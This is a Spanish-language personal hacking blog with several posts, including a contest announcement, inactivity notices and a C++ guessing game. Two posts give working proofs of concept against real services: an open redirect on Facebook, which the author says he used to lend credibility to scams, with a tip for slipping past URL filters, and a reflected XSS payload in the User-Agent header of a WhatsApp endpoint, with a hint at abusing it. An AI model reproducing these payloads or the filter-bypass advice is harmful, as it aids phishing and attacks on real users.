¡GANA ENTRADAS AL #CPCO7!

Tecleado por Maztor On 14:46 0 comentarios
 
Campus Party Colombia 2014 te invita a que hagas parte desde ya de esta 7ma edición, envíanos un video  donde nos cuentes  que es lo que más te gusta y te ha gustado de los anteriores Campus Party,  subirlo a Youtube o Instagram y enviarnos el link a las publicaciones en nuestra cuenta en Facebook (facebook.com/campuspartycolombia)  relacionadas con la actividad o mencionándonos en una tweet a nuestra cuenta oficial @CampusPartyCo y podrás ser el ganador de una de las 5 entradas que estaremos sorteando entre los participantes.

Puedes revisar todos los términos y condiciones de esta actividad aquí--> http://bit.ly/1oQT95I
Hola, tanto tiempo sin postear nada, aqui les dejo el PoC de una linda vulnerabilidad encontrada en facebook.




===========================================================================
PoC (Proof of Concept)
===========================================================================
https://www.facebook.com/a.php?u=[URL]&eid=AQI3nLb-cbZLO4MEIfh8ch1JhGnK95p8_IR04kdY-3mie_ZpHM0EgQ62fojLdryJ9RiB2i3qG47hKoVUEoy7K9yD5iNdrvPViUHFwR3outptCuv9zHT5VZPuWWbuLbNBCH_X037vLav_ZXfQ9K_3YgIS3QfVjGcCHobTc8nkO8z7ZXUBgjO7mlCDg5D8ulgMsGaWX-5D2qYVnfbZpUTYAQZHsA48V6Ci-NSCq-el6lxezy6l_PXNvcCFRFxmIDkEj-5sPdg4petYpy7rLEdv_wxOEEhpdH0_c4uIbVXaZpByEkXIoYifOWFo19DXABgAEIZQUbP_gUXpUN4UxT3DmUnu7nbyXMLRNkxh1mvja4VJq1hRqUZVJG14xU1CB7Y0pqS-myxu59LzRpnQevvwCMl6MZRezPFVi8d9fx5I1A2tWqUL66E6kp3HbHLFV-rumA-FJIvPYXqEaTxMbnwgVvTo0ih1ec3LHKhf7DlpWzeBTesI9RVoNRxu4EXnwcEllyiqoqakeyC7hhC3-fHbDjSm6nPqXjGyfw1rPBWbdwDjKk-5WRrvnnNKHu4rKoD56Jj8g0BTZcmknoHlRWIdL0zGtZl1Uoq_PFYE4gwhKa_RrWs6tPosdFqVwZ3rLmMGQlu1cApbhgsLsEfhVo34VsHsEE3XQq59eyh7d92DZZIUPJXU1T7mW_rB4mQPs8TLu_ZJpIseDG-bLivBCiINak87EAptqmPjD2Azt-4l0pj8xxh5-w2WbfB_cHcuO8qNfK4QYiPnBo6cY_UP-vCvQMIhcr_b0A09uZvndO1BaNZ5Wb6ZIgrsBQsceDfT_bNwzi0vNl4RTg28h4VwZIsbX6Jq-KAYLOGGlrLJfGiATDqEeu2K0bqDGM9b8LZa008grfYJUyPPEmy3EgTFiUnyTnHmti4jyaHpguEPHgPujo2pglYvsFMT4XGad0nE670cU6wVRBH4lzEOxYTCaeJm6vTod-fLpGjngQUSYRaMRa7JoX8zZWV2R--aoJrrO0rBgn3-qVTDsxQn8yHiVXmhxvVWrCz_X_LC3oeAhziVWyxaDINFXaYzYaSgqnFE01K3xpV3nQQPbmIIqCe77QWGBmcVgH11jKJqU3jSTRbaLw5tnEd6S2xPH7i-eLGOiT-h-sxTwkaykGSMUwBuovxHYrvcRCTZq7MyNagNNjAeKfiyCDBcIbyNKzZKAmWA2EAhn6fsfaFtNe2G1bbiFf9QhPl5fsDZ-39Uvtxy9olsbj6PuxGmOy65kjI2XhjEIurtvkTbOcuOE2T2ppjPdWku5m9E&__tn__=%2AB&sig=116958

En la variable "u" se indicara la URL a la cual deseas que se redirija el usuario final, a veces el sistema de seguridad no permite ciertas URL's, por lo tanto utiliza un archivo redireccionador que te ayude a saltarlo.

PD: He utilizado el bug con la simple intencion de darle veracidad a los scams.

Ejemplo: PoC in Action!


Bytes!

Blog Inactivo

Tecleado por Maztor On 21:13 0 comentarios
Blog inactivo por compromisos academicos y diversos factores. 
Mil disculpas a los lectores, pronto estare redactando mas post's.

Saludos!

Whatsapp XSS Headers [USER-AGENT]

Tecleado por Maztor On 8:48 4 comentarios
Iniciando un nuevo dia, recuperandome un poco de mis bajas notas de la universidad... como habia comentado antes sobre mi tiempo de inactividad, hoy decidí divertirme un RATO para aprovechar esos 15 o 30 min sin nada que hacer... ¿Que mejor diversion que divagar en sitios buscando pequeños, basicos o avanzados XSS's ?

Pues bien no pasaron mas de 2:38 Min-Seg cuando ingrese a Whatsapp y note el lindo "detector" de USER-AGENT.

Pues como siempre tenemos ese instinto de "curiosidad" intentamos morir como le paso al pequeño gato curioso, en fin no somos gatos... Por experiencia conozco el tipico pensamiento mediocre de muchos programadores el cual consiste en dedicarle menos tiempo a lo "INTERNO" y que otros usuarios "no pueden ver"... Demasiado mediocre como descuidar Headers, Libs, filtros, etc; Nunca se sabe que tan rapido evoluvione un ataque y benificio XSS asi que segun mi opinion personal es mejor prevenir, aunque este no sea tan CRITICO y LETAL.


PoC 

Url Vulnearble: https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=%3CA%3E&me=%3CB%3E&u[]=%3CC%3E
--------------------------------------------------------------------------------------------------
Host: sro.whatsapp.net
User-Agent: [Vuln XSS Simple] <script>alert('@Mazt0r Was Here!')</script> 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
----------------------------------------------------------------------------------------------------

Result



Nota: una vulnerabilidad basica y sencilla pero se presta para mucha diversion. (Si entienden a lo que me refiero).

                                               [Verguenza usar Windows :( --- Pero No tengo PC al momento]

Saludos y Happy Hacking!


Blog Inactivo Por Universidad

Tecleado por Maztor On 16:33 3 comentarios
Blog Inactivo Por Universidad.

Picas y Fijas C++

Tecleado por Maztor On 19:04 1 comentarios
Esto me costo 1 dia y medio codearlo, no por lo dificil si no por que queria disfrutar lo divertido de este ejercicio, a la vez pudiendose compartir y que fuese facil su estudio o comprension para los que inician o estan activos en las presentes instrucciones.

En si ; el ejercicio esta realizado con instrucciones superbasicas para explotar al maximo la creatividad al ser aplicadas.

El codigo esta debidamente organizado y comentado para su posterior estudio.

////////////////////////////////////////////////////////////////////////////////////

// Titulo : Juego Picas y Fijas                                                   //

// Autor: MaztoR                                                                  //

// Blog : Maztor.blogspot.com || MaztoR [In]-Security                             //

// Twitter: @Mazt0r                                                               //
  
// Fecha de creacion: [04/Octubre/2012]                                           //

////////////////////////////////////////////////////////////////////////////////////


Ejecucion







------------------------------------------------------------------------------------------------------------------------
                                       Codigo en Pastebin: Link
                                       Codigo en Pastie: Link
                                       Codigo en Paste2: Link
                                       Codigo en Tinypaste: Link 
                                       Codigo en Safebin: Link
                                       Codigo en Codepad: Link
----------------------------------------------------------------------------------------------------------------------

Inactividad por unas Semanas.

Tecleado por Maztor On 13:03 3 comentarios
Bueno, debido a mi reciente ingreso a la universidad me temo que al estar en un ambiente nuevo, no se aun a lo que me enfrento, en referencia a esto me dedicare estas semanas iniciales al estudio para coger campo y no distraerme de forma externa, una vez me haya acostumbrado seguire escribiendo los articulos como se venia haciendo anteriormente.

Saludos! Espero me comprendan.
Related Posts Plugin for WordPress, Blogger...
Sigueme en Twitter

Qr-c0de Url Blog

Suscribirse al blog

Ingresar Email

¡Recomendar! y RSS